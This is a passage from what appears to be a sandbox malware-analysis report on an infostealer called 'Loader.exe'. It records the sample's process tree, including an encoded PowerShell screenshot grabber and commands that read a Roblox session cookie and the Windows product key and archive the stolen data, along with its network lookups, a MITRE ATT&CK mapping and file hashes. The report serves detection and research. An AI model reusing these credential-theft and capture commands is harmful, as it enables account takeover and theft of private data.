AgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5104
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qk4svojq\qk4svojq.cmdline"
        5⤵
        
        PID:916
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB42D.tmp" "c:\Users\Admin\AppData\Local\Temp\qk4svojq\CSC5AE1302D41004BB182576A189A2C32.TMP"
        6⤵
        
        PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4684
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4772
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5052
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4832
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1672
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1156
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1552
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4228
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8682\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\cbBQ9.zip" *"
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\_MEI8682\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI8682\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\cbBQ9.zip" *
      4⤵
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:3124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3148

Network

DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

145.197.77.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.197.77.23.in-addr.arpa

IN PTR

Response

145.197.77.23.in-addr.arpa

IN PTR

a23-77-197-145deploystaticakamaitechnologiescom
DNS

64.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.159.190.20.in-addr.arpa

IN PTR

Response
DNS

7.98.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.98.22.2.in-addr.arpa

IN PTR

Response

7.98.22.2.in-addr.arpa

IN PTR

a2-22-98-7deploystaticakamaitechnologiescom
DNS

blank-ci3yf.in

Loader.exe

Remote address:

8.8.8.8:53

Request

blank-ci3yf.in

IN A

Response
DNS

ip-api.com

Loader.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

Loader.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0

Response

HTTP/1.1 200 OK

Date: Fri, 17 Jan 2025 20:49:55 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

gstatic.com

Loader.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

216.58.212.227
DNS

227.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.212.58.216.in-addr.arpa

IN PTR

Response

227.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f31e100net

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f3�H

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f227�H
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

7.98.51.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.98.51.23.in-addr.arpa

IN PTR

Response

7.98.51.23.in-addr.arpa

IN PTR

a23-51-98-7deploystaticakamaitechnologiescom
DNS

ip-api.com

Loader.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/?fields=225545

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.3.0

208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

Loader.exe

347 B
307 B
5
3

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
216.58.212.227:443

gstatic.com

tls

Loader.exe

1.1kB
5.3kB
9
9
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

254 B
132 B
3
3

HTTP Request

GET http://ip-api.com/json/?fields=225545

8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

145.197.77.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

145.197.77.23.in-addr.arpa
8.8.8.8:53

64.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

64.159.190.20.in-addr.arpa
8.8.8.8:53

7.98.22.2.in-addr.arpa

dns

68 B
129 B
1
1

DNS Request

7.98.22.2.in-addr.arpa
8.8.8.8:53

blank-ci3yf.in

dns

Loader.exe

60 B
113 B
1
1

DNS Request

blank-ci3yf.in
8.8.8.8:53

ip-api.com

dns

Loader.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

Loader.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

216.58.212.227
8.8.8.8:53

227.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

227.212.58.216.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

7.98.51.23.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

7.98.51.23.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

Loader.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2ed738b5a133397ceaa850e1c0770a2c

SHA1
8a27df10998b73d55cadf7574a647e34a76ba170

SHA256
1c79d02d93acefc34f2e4c9cec668c46327b7a81217cf82f7fea414927acdb8f

SHA512
9cf68a62399700bba332aed2bf25ad11366becaaf7c7e67a69872204da93662bda7734e3c3c3322738e43bca08596c561607ed0a2b64dd4eb031e812aae3b5e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aeceee3981c528bdc5e1c635b65d223d

SHA1
de9939ed37edca6772f5cdd29f6a973b36b7d31b

SHA256
b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32

SHA512
df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a01e2fb38901e660f0bfb7778fe36bb4

SHA1
522d7558b016cc51b05f3b5526b158b21f96dc5d

SHA256
3604f0954081bf23a8393ac47f3f4ecdb102ff07fb1c1af91a10ec89c195d037

SHA512
e66cf56d2fa44c43260645a017851af3473578eefb9a56129fb3f872181dd199bdf25afcd04c4afdce1b65489e1e3610a5a37c66ca1cdb86279ea0951414562a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB42D.tmp

Filesize
1KB

MD5
8aea378eec8b7da2b514133739084be2

SHA1
5547c4471c283de9eea2f4f066c9fe65fd143302

SHA256
c7f54e88829f0ae41a290dad46d1ad500fd1c1f8ad7c2517d2a3266987d6813f

SHA512
fd7ce856381f4af812aa9e95488ac9c81f692d51142b7186b9d5cdfee8c7acd5f27f75b2bac5e5ebd4c503d10280e1bcda8b8de1e34a8de5d7991d1587956015

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_bz2.pyd

Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_decimal.pyd

Filesize
104KB

MD5
7ba541defe3739a888be466c999c9787

SHA1
ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

SHA256
f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

SHA512
9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_hashlib.pyd

Filesize
33KB

MD5
596df8ada4b8bc4ae2c2e5bbb41a6c2e

SHA1
e814c2e2e874961a18d420c49d34b03c2b87d068

SHA256
54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

SHA512
e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_lzma.pyd

Filesize
84KB

MD5
8d9e1bb65a192c8446155a723c23d4c5

SHA1
ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

SHA256
1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

SHA512
4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_queue.pyd

Filesize
24KB

MD5
fbbbfbcdcf0a7c1611e27f4b3b71079e

SHA1
56888df9701f9faa86c03168adcd269192887b7b

SHA256
699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

SHA512
0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_socket.pyd

Filesize
41KB

MD5
4351d7086e5221398b5b78906f4e84ac

SHA1
ba515a14ec1b076a6a3eab900df57f4f37be104d

SHA256
a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

SHA512
a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_sqlite3.pyd

Filesize
54KB

MD5
d678600c8af1eeeaa5d8c1d668190608

SHA1
080404040afc8b6e5206729dd2b9ee7cf2cb70bc

SHA256
d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

SHA512
8fd5f0fd5bd60c6531e1b4ad867f81da92d5d54674028755e5680fb6005e6444805003d55b6cbaf4cdad7b4b301cffab7b010229f6fd9d366405b8ade1af72d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\_ssl.pyd

Filesize
60KB

MD5
156b1fa2f11c73ed25f63ee20e6e4b26

SHA1
36189a5cde36d31664acbd530575a793fc311384

SHA256
a9b5f6c7a94fb6bfaf82024f906465ff39f9849e4a72a98a9b03fc07bf26da51

SHA512
a8181ffeb3cf8ef2a25357217a3dd05242cc0165473b024cf0aeb3f42e21e52c2550d227a1b83a6e5dab33a185d78e86e495e9634e4f4c5c4a1aec52c5457dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8682\base_library.zip

Filesize
1.4MB

MD5
2a138e2ee499d3ba2fc4afaef93b7caa

SHA1
508c733341845e94fce7c24b901fc683108df2a8

SHA256
130e506ead01b91b60d6d56072c468aeb5457dd0f2ecd6ce17dfcbb7d51a1f8c

SHA512
